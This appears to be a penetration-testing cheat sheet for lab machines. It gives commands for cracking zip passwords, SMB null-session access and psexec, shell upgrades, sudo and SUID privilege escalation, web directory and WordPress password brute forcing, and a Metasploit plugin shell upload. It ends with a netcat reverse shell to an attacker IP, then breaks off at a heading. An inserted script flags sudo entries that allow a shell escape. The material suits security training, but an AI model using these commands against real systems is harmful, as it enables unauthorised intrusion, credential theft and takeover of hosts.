1. Crack the password of a zip archive
zip2john extracts the archive's password hash into a file, and john cracks it (pass --wordlist=/path/to/list to use a wordlist; john --show prints the recovered password afterwards):
    zip2john backup.zip > passwd.txt
    john passwd.txt
2. Find
- Find files with the SUID bit set
    find / -perm -u=s -type f 2>/dev/null
If we find one, check GTFOBins (https://gtfobins.github.io/) to see whether that binary can be abused for privilege escalation.
- Find files owned by a particular group (here the group bugtracker)
    find / -type f -group bugtracker 2>/dev/null
- Find a file by name
On Linux:
    find / -name "user.txt" 2>/dev/null
On Windows (PowerShell):
    Get-ChildItem -Path C:\ -Recurse -Filter user.txt -ErrorAction SilentlyContinue
3. smb
If the target has port 445 open, first list its shares; -N skips authentication, so this works whenever a null session is allowed:
    smbclient -L \\\\10.10.10.27 -N
Then connect to a share and download files from it:
    smbclient \\\\10.10.10.27\\backup -N
    smb: \> get filename
Once we have a username and password, impacket's psexec.py gives a shell on the host:
    python3 psexec.py administrator@10.10.10.27
4. Upgrade shell to a tty
Either of these spawns a proper pty from a dumb reverse shell:
    SHELL=/bin/bash script -q /dev/null
    python3 -c "import pty;pty.spawn('/bin/bash')"
Afterwards press Ctrl-Z, run stty raw -echo; fg in the local terminal and set TERM=xterm in the remote shell so that tab completion, Ctrl-C and editors such as vim work.
5. Sudo
View which commands the current user may run with sudo:
    sudo -l
When a program listed there can launch another command, run it through sudo and use its shell escape to get a root shell. For example, in Vim started with sudo, type :!/bin/bash.
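As an added example (not code from the original notes), the POSIX shell helpers below cover the SUID search from section 2 and the sudo -l check from this section: suid_files lists setuid/setgid files under a directory, and sudo_escapes parses sudo -l output and flags commands whose GTFOBins entries offer a shell escape. The ESCAPE_BINS list is a deliberately short assumption, and the sudo -l sample for the user alice is constructed for the demo.

```shell
#!/bin/sh
# Added example (not part of the original notes). Two helpers for the
# "find SUID binaries" and "sudo -l" steps: suid_files walks a directory for
# setuid/setgid files, and sudo_escapes parses sudo -l output and flags
# commands whose GTFOBins entries offer a shell escape.

# List setuid or setgid regular files under the given root, one per line.
# It takes a root argument so it can be exercised on a scratch directory;
# on a target run: suid_files /
suid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Binaries that can spawn a shell when run as root. This short list is an
# assumption made for the example; GTFOBins has the complete set.
ESCAPE_BINS="vim vi nano less more man find awk bash sh python python3 perl env"

# Read "sudo -l" output on stdin. For every rule line such as
#   (ALL) NOPASSWD: /usr/bin/vim, /usr/bin/find /var/log
# print one line per command: "<nopasswd|password> <escape|plain> <command>".
sudo_escapes() {
    # Rule lines start with "(runas_user)" or "(runas_user : runas_group)";
    # drop that prefix and keep the rest of the line.
    grep -E '^[[:space:]]*\([^)]+\)' | sed -E 's/^[[:space:]]*\([^)]+\)[[:space:]]*//' |
    while IFS= read -r rule; do
        tag=password
        case "$rule" in
            NOPASSWD:*) tag=nopasswd; rule=${rule#NOPASSWD:}; rule=${rule# } ;;
        esac
        # A rule may list several commands separated by commas.
        printf '%s\n' "$rule" | tr ',' '\n' | while IFS= read -r cmd; do
            cmd=$(printf '%s' "$cmd" | sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//')
            [ -n "$cmd" ] || continue
            # Basename of the executable, ignoring any arguments in the rule.
            base=${cmd%% *}
            base=${base##*/}
            flag=plain
            for b in $ESCAPE_BINS; do
                if [ "$b" = "$base" ]; then flag=escape; fi
            done
            printf '%s %s %s\n' "$tag" "$flag" "$cmd"
        done
    done
}

# Constructed sample of sudo -l output for the user alice (not real data).
SUDO_L_SAMPLE='Matching Defaults entries for alice on target:
    env_reset, mail_badpass

User alice may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/vim, /usr/bin/find /var/log
    (root) /usr/bin/systemctl status'

# Run with "demo" as the first argument to parse the sample; on a real box
# pipe the live output in instead:  sudo -l | sudo_escapes
if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SUDO_L_SAMPLE" | sudo_escapes
fi
```

On the sample, the demo prints vim and find as nopasswd escape candidates and systemctl as a plain entry that still needs the user's password; anything tagged escape is the first thing to look up on GTFOBins.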
6. Website
Brute-force directories and files:
    gobuster dir -u http://10.10.10.29 -w /usr/share/wordlists/dirb/big.txt
Scan for common web server misconfigurations and save an HTML report:
    nikto -host http://10.10.10.28 -o _28.html
WordPress
Enumerate user accounts, then brute force their passwords with a user list and a password list:
    wpscan --url http://10.10.10.29/wordpress --enumerate u
    wpscan --url http://10.10.10.29/wordpress -U users.txt -P backupPasswords
With valid admin credentials, this Metasploit module uploads a malicious plugin and returns a shell:
    use exploit/unix/webapp/wp_admin_shell_upload
NetCat
Reverse shell from a Windows target back to 10.10.16.4 on port 7777:
    nc.exe -e cmd.exe 10.10.16.4 7777
Listen on the attacking machine first:
    nc -lvnp 7777
Dump Cached password